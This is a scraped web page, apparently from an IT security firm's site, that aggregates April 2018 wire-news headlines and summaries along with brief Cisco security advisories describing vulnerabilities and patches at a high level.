Islamic State suicide bomber kills 57 in Afghan capitalKABUL, Afghanistan (AP) — An Islamic State suicide bomber attacked a voter registration center in Afghanistan's capital on Sunday, killing 57 people and wounding more than 100 others, officials said.


 Sun, 22 Apr 2018 06:35:36 -0400 Korean Air boss apologises as hot-tempered daughters resign

Korean Air boss apologises as hot-tempered daughters resignKorean Air Chairman Cho Yang-ho on Sunday apologised for the "immature" behaviour of his two daughters and said they would both immediately resign from their company posts following separate controversies. Cho Hyun-min, the younger daughter who is marketing executive at the South Korean flag carrier, is under police investigation for assault after she was accused of throwing water into a man's face at a business meeting. Four years ago her older sister Cho Hyun-ah made global headlines for angrily kicking a cabin crew member off a plane after being served macadamia nuts in a bag rather than a bowl -- an incident quickly dubbed "nut rage".


 Sun, 22 Apr 2018 11:08:34 -0400 Manhunt Continues After 29-Year-Old Shooter Kills 4 at Nashville Waffle House

Manhunt Continues After 29-Year-Old Shooter Kills 4 at Nashville Waffle HouseThe shooter is still at large


 Sat, 21 Apr 2018 23:08:14 -0400 NASA Releases Astounding Video Of The Lagoon Nebula To Celebrate Hubble's Birthday

NASA Releases Astounding Video Of The Lagoon Nebula To Celebrate Hubble's BirthdayEver wanted to zoom near that central bulge in the Milky Way in the


 Sun, 22 Apr 2018 13:36:32 -0400 Israel dismisses claims that Mossad killed Palestinian activist in Malaysia

Israel dismisses claims that Mossad killed Palestinian activist in MalaysiaIsrael’s defence minister has dismissed claims that Israel assassinated a Palestinian Hamas member and scholar who was shot dead in Malaysia. Avigdor Lieberman said it was more likely Fadi al-Batsh, 35, was killed on Saturday as part of “an internal Palestinian dispute.” He also added that al-Batsh who was a scientist, was a "rocket expert and no saint”. The academic’s family had blamed the Mossad, Israel’s intelligence agency, for orchestrating the assassination.  "There are accusations only against the Israeli Mossad and the Malaysian government should accelerate the investigation," al-Batsh's father, Mohamed said. The Palestinian was killed by two assailants as he was heading to a mosque for dawn prayers, according to local police.  Kuala Lumpur police chief Datuk Seri Mazlan Lazim said one of the suspects "fired 10 shots, four of which hit the lecturer in the head and body. He died on the spot."  Palestinians attend a memorial ceremony for Fadi al-Batsh Credit: Ali Jadallah/Anadolu Agency/Getty Images Police said CCTV footage showed him being targeted by gunmen who had waited almost 20 minutes for him to arrive. On Sunday, the inspector general of the Malaysian police, Mohamad Fuzi Harun, said a comprehensive investigation was ongoing. He added that no clear motive had emerged and no arrests have been made so far. “Was he killed by a live bullet? My answer is yes. The post-mortem is ongoing now; we will give details later," he said. Ahmad Zahid Hamidi, Malaysia's deputy prime minister, said the suspects were believed to be Europeans with links to a foreign intelligence agency, according to state news agency Bernama.   The militant group, Hamas, described al-Batsh on Twitter as a “young Palestinian scholar from Jabalia in the Gaza Strip." It added: "He was a distinguished scientist who contributed to the energy sector.”  On Saturday they tweeted photos from the condolences tent set up for al-Batsh. The Iz-al Din al Qassam brigade, the Islamic movement’s militant wing, also held a memorial, which suggested al-Batsh was one of its military commanders, the Associated Press reported.   Al-Batsh was also known as a ‘second’ imam at his local mosque and had been reportedly been living in Malaysia for the past 10 years. He is survived by his wife and three children. 


 Mon, 23 Apr 2018 06:32:23 -0400 HRW: 'Men only' job ads show ongoing discrimination in China

HRW: 'Men only' job ads show ongoing discrimination in ChinaBEIJING (AP) — One job ad for Chinese high-speed train conductors called for candidates who were "fashionable and beautiful." Another ad targeting men for a job in a Chinese internet company included photos of a female employee pole-dancing.


 Sat, 21 Apr 2018 12:07:22 -0400 North Korea says it’s suspending nuclear and missile tests

North Korea says it’s suspending nuclear and missile testsThe announcement said the suspension will continue so long as there are no nuclear threats against North Korea and contained no indication that the country would give up its nuclear weapons.


 Sat, 21 Apr 2018 14:07:34 -0400 Michael Cohen, Donald Trump and the curse of loyalty

Michael Cohen, Donald Trump and the curse of loyaltyA number of analysts have been wondering aloud whether the loyalty of Michael Cohen, President Trump's personal lawyer, will pass the acid test of a federal indictment.


 Sun, 22 Apr 2018 04:30:50 -0400 Britain's Pippa Middleton pregnant with first child: Sun on Sunday

Britain's Pippa Middleton pregnant with first child: Sun on SundayBritain's Pippa Middleton, the younger sister of the Duchess of Cambridge, is pregnant with her first child, The Sun on Sunday newspaper reported. Middleton, 34, gained global fame when she acted as maid of honor at the 2011 wedding of her sister Kate to Prince William, who is second in line to the British throne. Middleton and her financier husband James Matthews married last year.


 Mon, 23 Apr 2018 06:19:00 -0400 Nicaraguan journalist shot dead on Facebook Live while covering protests

Nicaraguan journalist shot dead on Facebook Live while covering protestsA journalist was gunned down during a Facebook Live broadcast as he covered an anti-government protest in Nicaragua. Angel Gahona was describing damage to a cash machine at a bank in the town of Bluefields on the country's southern Caribbean coast, when a shot rang out and he fell to the ground, bleeding from the head. Another reporter in the area, Ileana Lacayo, said Mr Gahona, who worked for the Meridiano news show, died before reaching the hospital.


 Sun, 22 Apr 2018 04:16:07 -0400 Iran ex-prosecutor jailed months after sentence: media

Iran ex-prosecutor jailed months after sentence: mediaA former Iranian prosecutor has finally been taken to prison months after being sentenced over the death in custody of a protestor, the judiciary's news agency said Sunday. The delay in starting Saeed Mortazavi's two-year sentence had caused anger and ridicule in recent weeks, with mocked-up "Wanted" posters appearing for the notorious former prosecutor online and around Tehran. The former chief prosecutor for Tehran was sentenced last year over the death of a protester who had been jailed for taking part in the mass protests over alleged election-rigging in 2009.


 Sun, 22 Apr 2018 03:04:39 -0400 Smallville's Allison Mack was allegedly a 'top member' of cult that abused women

Smallville's Allison Mack was allegedly a 'top member' of cult that abused womenProsecutors claim Allison Mack was second-in-command at the upstate New York headquarters of an alleged cult. As she was led from court in Brooklyn on Friday, Allison Mack appeared to wipe away a tear. Flanked by lawyers and closely shadowed by FBI agents and federal marshals, the 35-year-old’s distress provided the first glimpse of what the future may hold for senior members of an alleged cult known as Nxivm.


 Sat, 21 Apr 2018 16:30:50 -0400 Colin Kaepernick Receives Amnesty International's Highest Honor For Activism

Colin Kaepernick Receives Amnesty International's Highest Honor For ActivismAmnesty International on Saturday named former San Francisco 49ers quarterback


 Sun, 22 Apr 2018 19:35:47 -0400 Shark bite victim previously attacked by bear and rattlesnake

Shark bite victim previously attacked by bear and rattlesnakeA Colorado man made it third time unlucky as he was attacked by a shark in Hawaii having already been mauled by a bear and bitten by a rattlesnake, all in less than four years, local media reported. Aged just 20-years-old, Dylan McWilliams was bodyboarding in the ocean off Kauai on Thursday, when what he believed to be a tiger shark between six and eight feet long took hold of his leg. The keen outdoorsman - who said he has worked as a survival training instructor - was able to swim around 30 yards back to shore, where a bystander called paramedics. "I didn't know if I lost half my leg or what," he said. McWilliams, of Grand Junction, western Colorado, received seven stitches in hospital - just months after he was given nine staples in his scalp following an altercation with a black bear at a Colorado summer camp last July. The 20-year-old received nine staples in his scalp, following a bear attack just last year in Colorado Credit: Dylan McWilliams/Facebook As he slept outdoors, McWilliams said he was awoken by the bear biting the back of his head. It then dragged him, only dropping its grip as he punched it and poked it in the eye. "I guess I was just in the wrong spot at the wrong time," he said of the attack, which caught the attention of media outlets worldwide. Dylan McWilliams is seen wrangling a snake Credit: Dylan McWilliams/Facebook The two attacks followed his first run-in with a rattlesnake during a Utah hiking trip. However, he told the Star Advertiser, the bite was not severe, and he was only ill for a couple of days. "My parents are grateful I'm still alive," he added.


 Sat, 21 Apr 2018 12:54:53 -0400 Hamas vows revenge for key member killed in Malaysia

Hamas vows revenge for key member killed in MalaysiaGAZA CITY, Gaza Strip (AP) — Gaza's ruling Hamas militant group said Saturday that a man who was gunned down in Malaysia was an important member of the organization, accusing Israel of being behind the brazen killing.


 Sat, 21 Apr 2018 16:14:00 -0400 Pelosi continues to rail against Republican tax cuts

Pelosi continues to rail against Republican tax cutsRepublicans consider 'phase 2' of the tax cuts. Tax Foundation's Scott Hodge gives his take.


 Sun, 22 Apr 2018 10:47:19 -0400 Mitt Romney Fails To Secure Utah Senate GOP Nomination, Will Face Primary

Mitt Romney Fails To Secure Utah Senate GOP Nomination, Will Face PrimaryMitt Romney failed to secure the Utah Senate Republican nomination outright at


 Mon, 23 Apr 2018 04:20:51 -0400 Royal baby name: print off the Telegraph's sweepstake and play

Royal baby name: print off the Telegraph's sweepstake and playNow that the Duchess of Cambridge has gone into labour with her third baby, it might be time to organise a fun flutter with your colleagues on what the new prince or princess will be called. Parking restrictions are already in place outside the Lindo Wing of St Mary's Hospital in London in preparation for the birth which is expected this month.  Simply click on the image below to create a printable pdf file, then all you need is a pair of scissors, a pen and up to 40 willing colleagues. Royal Baby Sweepstake download The dilemma of what to call the latest addition to the royal family is something the Duke and Duchess of Cambridge are no doubt wrestling with, but Mary is the public's favourite moniker. Punters have been betting that William and Kate will pick Mary if it's a girl - a name which has a long association with the British monarchy. Bookmaker William Hill has made the name their 3-1 favourite followed by Alice 6-1 and Victoria 8-1, while Coral has Mary and Alice as their joint favoured monikers at 5-1, with Victoria next with odds of 8-1. William's great-great grandmother, the wife of George V, was called Mary, a woman who the Prince of Wales still speaks of fondly, and Mary is one of the Queen's middle names. Could the Duke and Duchess of Cambridge name their third child after Queen Victoria? Credit: PA Britain has seen two Marys on the throne - Mary I, known as Bloody Mary for her persecution of Protestants, and Mary II, who ruled jointly as monarch with her Dutch husband, William III. Rupert Adams, from William Hill, said in early April more than 90 per cent of bets placed had been for female names: "The favourite is Mary but I cannot see it as it is massively over backed. Alice is good but personally I am all over Victoria - which makes good sense to me." If William and Kate have a girl they may be considering naming her Alice which was the name of the Duke of Edinburgh's mother. Royal Baby | Read more Princess Alice of Battenberg was born deaf but learned to speak and lip-read four languages, married Princess Andrew of Greece in 1903 and went on to establish an order of nuns and wore a habit to the Queen's coronation in 1953. Her grandmother was another Princess Alice - the third child and second daughter of Queen Victoria - who lived in Germany after marrying Prince Louis of Hesse. Duchess of Cambridge goes into labour with third royal baby, in pictures She was said to have had a warm heart and opened hospitals, championed women's causes, founded women's guilds and patronised women's unions. She died in 1878 when she was 35. For boys names, William Hill has Albert, Arthur and Fred all at odds of 14-1, while Coral has Albert and Arthur at 12-1, and a number of names at 16-1 including Arthur, Fred and Philip.


 Mon, 23 Apr 2018 06:39:19 -0400 Century-old sunken ship preserved in perfect condition beneath Lake Superior

Century-old sunken ship preserved in perfect condition beneath Lake SuperiorThese stunning images reveal the remains of a more than century-old sunken ship that has been preserved beneath freezing Lake Superior. The ship looks almost exactly the same as it did the day it sunk beneath waves all those years ago.


 Sat, 21 Apr 2018 12:51:06 -0400 Iran rejects US rights report as 'biased'

Iran rejects US rights report as 'biased'Iran rejected the latest US human rights report as hypocritical on Saturday, saying it was "biased by political objectives". "Iran considers the annual report by the US State Department and in particular allegations raised about human rights in Iran as absolutely biased by political objectives, which depicts a distorted and unrealistic image of our country's situation," said foreign ministry spokesman Bahram Ghasemi in a statement on the ministry website.


 Mon, 23 Apr 2018 08:11:00 -0400 Two-year-old girl accidentally shot dead by mother in Ohio hotel, police say

Two-year-old girl accidentally shot dead by mother in Ohio hotel, police sayA US woman with a permit to carry a concealed gun accidentally shot dead her two-year-old daughter, say police. Patrol officers and paramedics arrived at the Econo Lodge in Wickliffe at around 11pm to find the toddler with a bullet wound to the chest. The young girl later died in hospital despite the efforts of patrol officers and paramedics.


 Mon, 23 Apr 2018 01:31:43 -0400 New Ford Focus ST Reportedly Coming In 2019 With Bigger Engine

New Ford Focus ST Reportedly Coming In 2019 With Bigger EngineThe hot hatch is expected to eschew the automatic transmission to go manual-only.


 Mon, 23 Apr 2018 07:07:31 -0400 2019 Toyota Avalon Trying to Shake Reputation as Boring

2019 Toyota Avalon Trying to Shake Reputation as BoringToyota is taking a two-pronged attack with its redesigned Avalon, replacing its rather vanilla sedan with a model that has two distinct personalities: sophisticated and sporty. There are essentia...


 Mon, 23 Apr 2018 07:01:11 -0400 S.Korea halts propaganda broadcasts before summit with North

S.Korea halts propaganda broadcasts before summit with NorthSEOUL, South Korea (AP) — South Korea halted anti-North Korea propaganda broadcasts across their tense border on Monday as officials from the two Koreas met again to work out details of their leaders' upcoming talks, expected to focus on the North's nuclear program.


 Sun, 22 Apr 2018 17:02:06 -0400 G7 foreign ministers' summit to hold tough line on Russia: sources

G7 foreign ministers' summit to hold tough line on Russia: sourcesBy David Ljunggren and Lesley Wroughton TORONTO (Reuters) - Foreign ministers from the Group of Seven leading industrialized nations are expected to maintain a tough line on Russia over its involvement in conflicts in Syria and Ukraine, while leaving the door open to cooperation, two sources briefed on the matter said on Sunday. The ministers, meeting in Toronto for two days, spent part of the first day discussing tensions with Russia, which are straining an already bruised relationship with the West. The sources, speaking on condition of anonymity, said a final statement from the ministers was set to maintain an uncompromising line with Moscow, which the G7 has condemned for annexing Crimea and backing militants in eastern Ukraine.


 Sun, 22 Apr 2018 13:27:17 -0400 Trump Celebrates Earth Day By Praising Rollback Of Environmental Protections

Trump Celebrates Earth Day By Praising Rollback Of Environmental ProtectionsPresident Donald Trump commemorated Earth Day on Sunday by applauding his


 Sun, 22 Apr 2018 16:04:53 -0400 Netflix Sought To Purchase A Chain Of Movie Theaters

Netflix Sought To Purchase A Chain Of Movie TheatersStreaming service Netflix has been looking to buy its own series of movie


 Sat, 21 Apr 2018 19:02:14 -0400 White nationalists rally in Newnan, Ga.

White nationalists rally in Newnan, Ga.The National Socialist Movement, one of the largest neo-Nazi groups in the U.S., held a rally on April 21, 2018, in Newnan, Ga. Community members have opposed the rally and came out to embrace racial unity in the small Georgia town. Fearing a repeat of the violence that broke out after the Charlottesville, Va., demonstrations,  hundreds of police officers were stationed in the town during the rally in an attempt to keep the anti-racist protesters and neo-Nazi groups separated.


 Sun, 22 Apr 2018 10:16:07 -0400 4 dead, several injured in Waffle House shooting

4 dead, several injured in Waffle House shootingOne person at the restaurant wrestled the rifle away from the gunman, police said.


 Mon, 23 Apr 2018 09:59:26 -0400 European and US stocks climb

European and US stocks climbEuropean and US stock markets pushed higher on Monday as trade and geopolitical tensions eased, analysts said.


 Mon, 23 Apr 2018 02:49:13 -0400 Canadian lynched by villagers in Peruvian Amazon after death of elderly healer

Canadian lynched by villagers in Peruvian Amazon after death of elderly healer A Canadian man was lynched in the Peruvian Amazon after residents of a remote village accused him of killing an 81-year-old medicine woman a day earlier, a spokesman for the attorney general's office said on Sunday. Olivia Arevalo, a traditional healer of the Shipibo-Conibo tribe, was shot twice and died on Thursday near her home in the Amazonian region of Ucayali, said Ricardo Palma Jimenez, the head of a group of prosecutors in Ucayali. Some villagers had blamed Ms Arevalo's murder on Sebastian Paul Woodroffe, a 41-year-old Canadian citizen who lived in the region and who was believed to have been one of her clients, said Jimenez. Police found Mr Woodroffe's body buried about just over half a mile from Ms Arevalo's home on Saturday, after a cellphone video recording of the Friday lynching was shared on social media, said Jimenez. The video shows a man groaning in a puddle near a thatched-roof structure as another man puts a rope around his neck and drags him with others looking on. Sebastian Woodroffe was found buried. Villagers in remote parts of Peru often punish suspects according to local customs and without the involvement of authorities Jimenez said prosecutors were exploring several hypotheses related to Ms Arevalo's murder and that it was too early to name suspects in the case. No arrests had been made yet related to Woodroffe's death, he added. "We will not rest until both murders, of the indigenous woman as well as the Canadian man, are solved," said Jimenez in a phone interview. Jimenez said the man in the video was Mr Woodroffe and that an autopsy of his body showed he died by strangulation after receiving several blows across his body. Ms Arevalo's murder had prompted outrage in Peru following other unsolved murders of indigenous activists who had repeatedly faced death threats related to efforts to keep illegal loggers and oil palm growers off native lands. Policing is scant over much of the Peruvian Andes and Amazon and villagers in far-flung provinces often punish suspected criminals according to local customs and without the involvement of state police and prosecutors. "Canada extends its deepest condolences following the reported assassination of‎ Olivia Arévalo Lomas, an Indigenous elder and human rights defender," Global Affairs Canada, which manages Canadian foreign relations, said in a statement. "We are also aware that a Canadian ‎was killed in a related incident. Consular services are being provided to the family of the Canadian," it added.


 Mon, 23 Apr 2018 05:28:02 -0400 Volvo S90 Ambience Concept Is A Three-Seater Luxury Cocoon

Volvo S90 Ambience Concept Is A Three-Seater Luxury CocoonCombines visuals, sounds, and scents to make your travel as relaxing as possible.


 Sun, 22 Apr 2018 15:40:26 -0400 World's Oldest Person Dies at the Age of 117

World's Oldest Person Dies at the Age of 117Another Japanese woman now holds the title.


 Sat, 21 Apr 2018 18:47:53 -0400 Saudi security shoots down recreational drone near royal palace

Saudi security shoots down recreational drone near royal palaceBy Rania El Gamal and Stephen Kalin DUBAI/RIYADH (Reuters) - Saudi Arabian security forces said they had shot down a recreational drone in the capital on Saturday after online videos showing gunfire in a neighborhood where royal palaces are located sparked fears of possible political unrest. The Riyadh police spokesman, quoted by the official Saudi News Agency (SPA), said a security screening point noticed the flying of a small unauthorized recreational drone at 7:50 p.m. local time (1650 GMT), leading security forces to deal with it according to their orders and instructions. There were no casualties, and King Salman was not at his palace at the time, a senior Saudi official told Reuters.


 Sat, 21 Apr 2018 13:52:23 -0400 Dems' lawsuit alleges conspiracy between Trump camp, Russia

Dems' lawsuit alleges conspiracy between Trump camp, RussiaNEW YORK (AP) — A lawsuit by Democratic Party accuses Donald Trump's presidential campaign, Russia, WikiLeaks and Trump's son and son-in-law of engaging in a conspiracy to undercut Democrats in the 2016 election by stealing tens of thousands of emails and documents.


 Mon, 23 Apr 2018 08:19:11 -0400 Beyoncé Falls On Stage At Coachella, May Possibly Still Be Human

Beyoncé Falls On Stage At Coachella, May Possibly Still Be HumanBeyonce took the stage again at Coachella in Indio, California, over the



Cisco Security Advisory   more  xml  hide  
last updated: Mon, 23 Apr 2018 14:45:05 GMT

 Fri, 20 Apr 2018 12:43:39 CDT Cisco Adaptive Security Appliance WebVPN Cross-Site Scripting Vulnerability
A vulnerability in the Login screen of the Clientless SSL VPN (WebVPN) portal of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device.

The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-asawvpn
Security Impact Rating: Medium
CVE: CVE-2018-0242
 Fri, 20 Apr 2018 12:43:38 CDT Cisco ASA Software, FTD Software, and AnyConnect Secure Mobility Client SAML Authentication Session Fixation Vulnerability
A vulnerability in the implementation of Security Assertion Markup Language (SAML) Single Sign-On (SSO) authentication for Cisco AnyConnect Secure Mobility Client for Desktop Platforms, Cisco Adaptive Security Appliance (ASA) Software, and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software. The authentication would need to be done by an unsuspecting third party.

The vulnerability exists because there is no mechanism for the ASA or FTD Software to detect that the authentication request originates from the AnyConnect client directly. An attacker could exploit this vulnerability by persuading a user to click a crafted link and authenticating using the company's Identity Provider (IdP). A successful exploit could allow the attacker to hijack a valid authentication token and use that to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-asaanyconnect
Security Impact Rating: High
CVE: CVE-2018-0229
 Thu, 19 Apr 2018 21:07:10 CDT Cisco WebEx Clients Remote Code Execution Vulnerability
A vulnerability in Cisco WebEx Business Suite clients, Cisco WebEx Meetings, and Cisco WebEx Meetings Server could allow an authenticated, remote attacker to execute arbitrary code on a targeted system.

The vulnerability is due to insufficient input validation by the Cisco WebEx clients. An attacker could exploit this vulnerability by providing meeting attendees with a malicious Flash (.swf) file via the file-sharing capabilities of the client. Exploitation of this vulnerability could allow arbitrary code execution on the system of a targeted user.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-wbs
Security Impact Rating: Critical
CVE: CVE-2018-0112
 Wed, 18 Apr 2018 16:00:00 CDT Cisco MATE Collector Cross-Site Request Forgery Vulnerability
A vulnerability in the web-based management interface of Cisco MATE Collector could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.

The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-MATE
Security Impact Rating: Medium
CVE: CVE-2018-0259
 Wed, 18 Apr 2018 16:00:00 CDT Cisco Wireless LAN Controller Default Simple Network Management Protocol Community Strings
With new installations of Cisco Wireless LAN Controller Software, the installation scripts create default community strings for Simple Network Management Protocol (SNMP) Version 2 (SNMPv2) and default usernames for SNMP Version 3 (SNMPv3), both allowing for read and write access.

As documented in the Cisco Wireless LAN Controller Configuration Best Practices guide, the SNMP configuration should either be changed or disabled depending on the environmental requirements. If the default community strings and usernames are not changed or disabled, the system is open for read and write access through SNMP.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-wlc
Security Impact Rating: Informational

powered by zFeeder

Reload this page to check for the most recent news updates.

Please read our legal disclaimer for the use of this information.

Stay Secure
Axiom understands how vital the security of your data is to your organization. Please don't hesitate to contact us if you would like a professional assessment of your network infrastructure.
Home Axiom Advisor Security Bulletins